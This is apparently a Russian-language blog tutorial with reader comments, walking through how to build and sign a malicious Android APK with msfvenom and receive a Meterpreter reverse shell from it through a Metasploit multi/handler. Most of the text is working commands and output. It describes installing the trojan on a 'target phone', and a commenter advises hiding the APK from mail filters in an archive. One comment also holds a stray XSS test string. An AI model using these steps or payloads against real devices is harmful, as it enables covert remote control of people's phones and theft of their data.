В нашем недавнем посте мы научились взламывать windows с помощью Kali Linux. На этот раз мы будем взламывать андроид с Kali Linux. Мы сделаем это с использованием инструмента msfvenom в Kali Linux, который является наилучшей комбинацией Msfpayload и Msfencode.
1. Создать Payload
Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.
root@destroyer:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.50 LPORT=4444 R > /root/MyPath/my0704.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 9485 bytes
В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.
Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.
а. Создание хранилища ключей:
root@destroyer:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000
Выше команда спрашивает вопросы и пароль.
б. Подписать созданный файл с помощью jarsigner apk.
root@destroyer:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app Enter Passphrase for keystore: adding: META-INF/APP.SF adding: META-INF/APP.RSA signing: classes.dex signing: AndroidManifest.xml signing: resources.arsc jar signed. Warning: No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.
с. Проверьте apk, созданный с помощью jarsigner.
root@destroyer:~# jarsigner -verify -verbose -certs /root/MyPath/my0704.apk
д. Оптимизация файла с помощью zipalign apk.
Перед тем как начать работу, установите zipalign с помощью команды ниже:
apt-get install zipalign
Теперь позвольте оптимизировать apk.
root@destroyer:~# zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk Verifying alignment of /root/MyPath/my0704_sign.apk (4)... 50 META-INF/MANIFEST.MF (OK - compressed) 281 META-INF/APP.SF (OK - compressed) 623 META-INF/APP.RSA (OK - compressed) 1752 META-INF/ (OK) 1802 META-INF/SIGNFILE.SF (OK - compressed) 2087 META-INF/SIGNFILE.RSA (OK - compressed) 2750 classes.dex (OK - compressed) 8726 AndroidManifest.xml (OK - compressed) 10443 resources.arsc (OK - compressed) Verification successful
Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».
2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.
root@destroyer:~# msfconsole Call trans opt: received. 05-01-17 20:00:10 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` http://metasploit.com Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:
msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) >
В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.
msf exploit(handler) > set LHOST 192.168.0.50 LHOST => 192.168.0.50 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) >
А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.0.50:4444 [*] Starting the payload handler...
Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.
После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.
Спасибо, это бомба
apk палится почтовиком и не пересылает как спрятать АПК?
Архивом
alert(1);”>alert(1);
После первой команды пишет: Нет такого файла или каталога: /root/MyPath/my0704.apk (что делать?)
Vnimatel’no sledi! Navernoe, u tebya net papki “MyPath”
MyPath это твой домашний каталог на писать свой на этот
ничего не происходит после открытия на телефоне
В том то и прикол, поищи в интернете ещё статьи по мсфвеном. Там будет кучка команд)